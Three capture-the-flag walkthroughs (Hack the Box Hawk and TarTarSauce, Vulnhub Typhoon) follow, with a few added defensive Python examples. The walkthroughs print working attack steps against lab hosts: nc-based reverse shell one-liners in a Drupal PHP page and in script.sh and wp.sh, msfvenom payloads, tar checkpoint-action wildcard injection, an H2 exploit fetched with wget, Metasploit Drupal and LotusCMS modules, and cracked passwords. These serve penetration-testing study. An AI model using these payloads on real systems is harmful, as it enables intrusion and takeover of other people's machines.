Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge, “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt
Note: Since these labs are available online, they have a static IP. The IP of HawkNew is 10.10.10.102

Penetration Methodology:
§  Port scanning and IP discovery
§  Anonymous FTP Login
§  Checking file type
§  Getting Login Credentials
§  Browsing IP through port 80
§  Exploiting Drupal
§  Reading First Flag User.txt
§  Getting Login Credentials
§  Spawning TTY Shell
§  Searching exploit via Searchsploit
§  Getting root Access
§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21 (ftp), 22 (ssh), 80 (http server running Drupal CMS), 8082 (H2 database HTTP console).



From the Nmap scan output we saw that FTP port 21 is open, and the next thing that catches our eye is that anonymous login is allowed.

ftp 10.10.10.102

We easily connected to FTP through anonymous login. Moving on, after navigating through multiple directories we found a hidden file, “.drupal.txt.enc”, and transferred it to our local machine.



Since .drupal.txt.enc is encrypted, let’s check the file type using the ‘file’ command.

file .drupal.txt.enc

It came out to be OpenSSL encrypted data with a salted password. Clearly we need to decrypt the file to get any further clue.




To crack this file, we used an OpenSSL brute-force tool which is easily available on GitHub. You can download it from the link given below, or run the following commands to download it and execute the script.

git clone https://github.com/deltaclock/go-openssl-bruteforce.git
./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file, and the password hint we got is “PencilKeyboardScanner123”; this could be the password for the CMS login. Let’s check it.
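To show why `file` recognises the blob and why a guessable password is all the brute-force tool needs, here is an added example (not from the original post or from the tool’s author) that parses the OpenSSL `Salted__` header and reproduces the legacy EVP_BytesToKey derivation OpenSSL `enc` uses when `-pbkdf2` is not given; the sample blob, the 32-byte key / 16-byte IV sizes (aes-256-cbc) and the password are assumptions.

```python
import hashlib
from typing import Tuple

# OpenSSL "enc" output starts with the 8-byte magic "Salted__", then an
# 8-byte salt, then ciphertext. `file` matches that magic to report
# "openssl enc'd data with salted password".
MAGIC = b"Salted__"
# Constructed sample, not the lab's .drupal.txt.enc: fixed salt, dummy body.
SAMPLE_BLOB = MAGIC + bytes(range(8)) + b"\x00" * 32


def parse_salted(blob: bytes) -> Tuple[bytes, bytes]:
    """Split an OpenSSL 'Salted__' blob into (salt, ciphertext)."""
    if len(blob) < 16 or blob[:8] != MAGIC:
        raise ValueError("not OpenSSL salted data")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int,
                     iv_len: int, digest: str = "md5",
                     count: int = 1) -> Tuple[bytes, bytes]:
    """Legacy OpenSSL EVP_BytesToKey.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt), and the
    D_i are concatenated until key_len + iv_len bytes exist. Without -pbkdf2
    OpenSSL uses MD5 with count=1, so every password guess costs one hash,
    which is why a short password falls to a brute-force tool quickly.
    """
    material = b""
    prev = b""
    while len(material) < key_len + iv_len:
        block = hashlib.new(digest, prev + password + salt).digest()
        for _ in range(count - 1):
            block = hashlib.new(digest, block).digest()
        material += block
        prev = block
    return material[:key_len], material[key_len:key_len + iv_len]


def derive_for_blob(blob: bytes, password: str) -> Tuple[bytes, bytes, bytes]:
    """Return (salt, key, iv) for a 32-byte key / 16-byte IV cipher (assumed)."""
    salt, _ = parse_salted(blob)
    key, iv = evp_bytes_to_key(password.encode(), salt, 32, 16)
    return salt, key, iv
```

Files produced with `openssl enc -pbkdf2` (or with an iteration count) use a slow KDF instead, which is the configuration change that blunts this kind of cracking.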



As port 80 is running an HTTP server, we open the target machine’s IP address in our browser and find a Drupal login page. To log in to this page we used the basic username admin and the password PencilKeyboardScanner123.


Oh yeah!! We have successfully logged into the admin dashboard. Now go to Modules and enable the checkboxes for Path and PHP filter.





After that, go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Give your malicious code any title.
Here we have written a one-liner PHP reverse shell with the help of the Pentest Monkey website.

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the text format “PHP code”. Before saving it, start a netcat listener on the listening port, so that once the code is executed it establishes a reverse connection.
nc -lvp 1234




We got a reverse connection from the victim’s machine on our netcat listener. To spawn a proper shell we used the python3 pty one-liner.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Inside /home/daniel we got the user.txt flag; now it is time to find the root flag. While exploring the directories, we thought of reading the contents of the “settings.php” file, and in this file we found the password: drupal4hawk
grep -i password settings.php


Then with the following command we switch user and log in as daniel.
su daniel
Password: drupal4hawk
Since this drops us into a python3 interpreter, we used simple python3 commands to escape it.
>>> import pty
>>> pty.spawn('/bin/bash')


From the Nmap scan output we noticed that an H2 database is running on port 8082, so we searched for an H2 database exploit in searchsploit.
searchsploit H2 database
It came out to be a Remote Code Execution. The exploit we used is highlighted; after that we copied the exploit 45506.py to the /root directory and ran a Python server to download the file onto the target machine.
searchsploit -m 45506
python -m SimpleHTTPServer 8080



Afterwards we downloaded our exploit 45506.py into the /tmp directory of the target machine, granted full permissions to the exploit, and executed it with the following commands.
cd /tmp
wget http://10.10.14.10:8080/45506.py
chmod 777 45506.py
python3 45506.py -H 127.0.0.1:8082
id
Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and find our final flag.





Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst.

Typhoon: Vulnhub Walkthrough


Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.
Flag: root-flag
Since there are multiple ways to exploit this machine, we have used two methods to capture the flag, as follows:
Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.
Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.
netdiscover


We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The Nmap output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgresql), 8080(http).
Further, we notice an entry /mongoadmin/ in robots.txt, which might be useful.




We also noticed that port 8080 is open for Apache Tomcat/Coyote JSP Engine 1.1. This could be another way of exploiting this machine, but we will come to it later.


Moving on, since port 80 is also open, we browsed to the directory we found, /mongoadmin/. The result is shown in the image. Here we change the database to credentials (84mb). It displays a link to 2 Credentials; click on it.


Clicking on the 2 Credentials link gives us two credentials: [username]:typhoon and [password]:789456123. These credentials might be a great help for further enumeration.


After some time, we struck on an idea: WHY NOT USE THE FOUND CREDS TO LOG IN WITH SSH? After all, SSH port 22 is also open.
So we simply logged in to SSH with the credentials Username: typhoon & Password: 789456123
ssh typhoon@192.168.1.101
Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.


Next we look for an exploit for Ubuntu 14.04 using searchsploit. The exploit we used is highlighted; after that we copied the exploit 37292.c to the /root/ directory and ran a Python server to download the file onto the target machine.


Afterwards we downloaded our exploit 37292.c into the /tmp directory, compiled it, granted it execute permissions and ran it.
Booyeah!! We have got root access and found our FLAG. We take a look at the content of the file and are greeted with a congratulatory message.


Method 2
Using the Tomcat Manager upload to get a meterpreter session, then establishing a further reverse connection to get root access.
Let’s Begin with the Walkthrough!!
In the Method 1 port scan we noticed that port 8080 is open for Apache Tomcat/Coyote JSP Engine 1.1, so let’s browse to the target IP on port 8080.


We are very familiar with the Tomcat Server login via the manager webapp from our previous lab experience. Without wasting time we logged straight into the Tomcat server using Metasploit’s Tomcat Manager module with the default credentials for the Tomcat server login.
[username]:tomcat
[password]:tomcat
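The default tomcat:tomcat login is the weak point here, so as an added example (not part of the original walkthrough or of the Typhoon VM) here is a small audit of a Tomcat `tomcat-users.xml` that flags users whose password is a default or equals their username and lists the Manager roles such an account would expose; the XML content and the weak-password list are constructed for the example.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed tomcat-users.xml mirroring the weak configuration the
# walkthrough relies on (a manager user with a guessable password).
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xq7!v9Lp2#mR" roles="manager-script"/>
</tomcat-users>
"""

# Passwords that default-credential sweeps (Metasploit's tomcat_mgr_login
# included) try first; assumed list for the example.
WEAK_PASSWORDS = {"tomcat", "admin", "password", "s3cret", "manager",
                  "root", "changeme", ""}
# Roles that grant access to the Manager application, i.e. WAR upload.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui"}


def audit_tomcat_users(xml_text: str) -> List[Dict[str, object]]:
    """Return one finding per user with a default/weak password or a
    password equal to the username, with the Manager roles it holds."""
    root = ET.fromstring(xml_text)
    findings: List[Dict[str, object]] = []
    for user in root.iter("user"):
        name = user.get("username", "")
        pw = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        if pw.lower() in WEAK_PASSWORDS or pw.lower() == name.lower():
            findings.append({
                "username": name,
                "manager_roles": sorted(roles & MANAGER_ROLES),
                "reason": "default or weak password",
            })
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```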
Oh yeah! We have got the meterpreter. After spending a lot of time on enumeration, we found a directory /tab containing a file script.sh that is owned by root and has full permissions. So we thought of inserting malicious code into script.sh.


Moving on!! We need to create a bash payload using msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R
After that, append the generated malicious code to the script.sh file.


echo "mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0</tmp/vvwjo | /bin/sh >/tmp/vvwjo 2>&1; rm /tmp/vvwjo" > script.sh


Since the malicious code was executed along with the script.sh file, we got a reverse shell on our netcat listener.
Yeah!! We have got root access and found root-flag. We take a look at the content of the file and are greeted with a congratulatory message.



3rd Method: Exploiting Drupal CMS
Unfortunately, on exploring port 80 we didn’t observe anything remarkable, so we enumerate the web directories with the help of the Dirb tool.

dirb http://192.168.1.101

It was wonderful to observe that there were two CMSs, as highlighted in the image below.




On exploring /drupal in the web browser, it put up the following web page, which belongs to Drupal CMS.




Without wasting much time, we turn to Metasploit and run the following module to exploit Drupal CMS.
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
Booom!! It was a terrific moment to see a meterpreter session on the target machine. For post exploitation you can follow the methodology already discussed in the 1st method.




4th Method: Exploiting Lotus CMS
Scroll up and notice the result we obtained from the dirb scan, where we found two CMSs. We have already exploited Drupal; now let’s go for the next CMS and try to exploit it, if possible.
So on exploring /cms in the web browser, it put up the following web page, which belongs to Lotus CMS.




Without wasting much time, we again turn to Metasploit and run the following module to exploit Lotus CMS.

use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit

Great, we have obtained another meterpreter session on the target machine. For post exploitation you can follow the methodology already discussed in the 1st method.


Hack the Box: TarTarSauce Walkthrough

Today we are going to solve another CTF challenge, “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of TarTarSauce is 10.10.10.88
Penetration Methodology
§  Network scanning (Nmap)
§  Directory Enumeration (Dirb)
§  Exploiting WordPress against an RFI Vulnerability
§  Spawning TTY shell
§  Check sudoers list permissions
§  Wildcard injection privilege escalation
§  Modify backup file to get root flag


Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -A 10.10.10.88
From the image below, you can observe that port 80 is open for the http service and that robots.txt has 5 disallowed entries.





Let’s navigate to port 80 through a web browser. Entering the IP in the URL bar puts up the web page shown in the image below.


We don’t find anything on the web page, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. As we don’t find anything in that directory itself, we enumerate “/webservices/” further.
dirb http://10.10.10.88
dirb http://10.10.10.88/webservices/


The dirb scan gave us the directory “/webservices/wp/”, which hosts a WordPress site.



We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for an exploit and find that it is vulnerable to Remote File Inclusion (RFI).




We follow the instructions given in the PoC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to the desktop and rename it to wp-load.php so that the RFI executes our PHP shell. We start our Python HTTP server to exploit the RFI on the target machine.
python -m SimpleHTTPServer 80



We set up our listener using netcat; as soon as we execute our PHP shell through the RFI, we get a reverse shell. We go to the “/home” directory and find a folder called “onuma”, which we are unable to access. So we spawn a TTY shell using python to check the sudoers list.
python -c 'import pty; pty.spawn("/bin/bash")'
We check the sudoers list and find that we can run tar as user “onuma” without a password. Hence we can exploit wildcard injection for privilege escalation.
sudo -l




We create an nc reverse shell using msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R



Now we move to the reverse shell and create a bash file containing the nc command, saved as “wp.sh”.
tar can execute commands through “--checkpoint-action”. Because the sudo rule runs tar over a wildcard, file names beginning with “--” are parsed as options, so we create files named “--checkpoint-action=exec=sh wp.sh” and “--checkpoint=1” to run our command as user onuma.
mkdir data
cd data
echo "mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0</tmp/cezbk | /bin/sh >/tmp/cezbk 2>&1; rm /tmp/cezbk" > wp.sh
echo "" > "--checkpoint-action=exec=sh wp.sh"
echo "" > --checkpoint=1
sudo -u onuma /bin/tar cf archive.tar *
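From the defending side, the sudo rule above is dangerous only because the shell expands `*` into tar’s argument list. As an added example (not from the original walkthrough), the script below flags option-like file names in a directory and archives it in a way that cannot be hijacked by such names, using Python’s `tarfile` module with explicit paths; the sample directory layout is constructed to mirror the one built above. The equivalent fix for a shell one-liner is to end option parsing before the glob (`tar cf archive.tar -- *`) or to use paths that cannot start with a dash (`tar cf archive.tar ./*`).

```python
import os
import tarfile
import tempfile
from typing import Dict, List


def option_like_names(directory: str) -> List[str]:
    """Names a shell glob would hand to tar as options (e.g. '--checkpoint=1').
    Any entry starting with '-' in a directory that a privileged tar run
    globs over is worth an alert: legitimate web content never needs one."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def safe_archive(directory: str, out_path: str) -> List[str]:
    """Archive every entry of `directory` by explicit path.

    tarfile never parses member names as options, so a file called
    '--checkpoint-action=exec=sh wp.sh' ends up as plain data in the archive.
    Returns the member names so the caller can verify what was stored.
    """
    with tarfile.open(out_path, "w") as tar:
        for name in sorted(os.listdir(directory)):
            tar.add(os.path.join(directory, name), arcname=name)
    with tarfile.open(out_path) as tar:
        return sorted(tar.getnames())


def demo() -> Dict[str, List[str]]:
    """Build a constructed directory like the one in the walkthrough and run
    both the detection and the hardened archive step over it."""
    src = tempfile.mkdtemp()
    for name in ("wp.sh", "--checkpoint-action=exec=sh wp.sh",
                 "--checkpoint=1", "index.html"):
        with open(os.path.join(src, name), "w") as fh:
            fh.write("")  # empty placeholder files, contents irrelevant here
    out = os.path.join(tempfile.mkdtemp(), "archive.tar")
    return {"flagged": option_like_names(src), "members": safe_archive(src, out)}


if __name__ == "__main__":
    print(demo())
```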


We set up our listener using netcat; as soon as we run the tar command as user “onuma” we get a reverse shell as that user. We change directory to /home/onuma, find the file “user.txt”, and read it to get the 1st flag. After finding the flag we spawn a TTY shell using python.
python -c 'import pty; pty.spawn("/bin/bash")'



Enumerating the system, we find a file called backuperer, which is symlinked to a file named “backup” in the “/usr/local/bin” directory.



We take a look at the content of the file and find that it creates a gzip archive of the files inside “/var/www/html/”. It also checks the integrity of the archive 30 seconds after creating it.



We use a script that takes advantage of the “sleep” in that script: because it waits 30 seconds before checking the integrity of the archive, we have a 30-second window in which to replace the archive with our own. We use this script here. After running the script we find the root flag.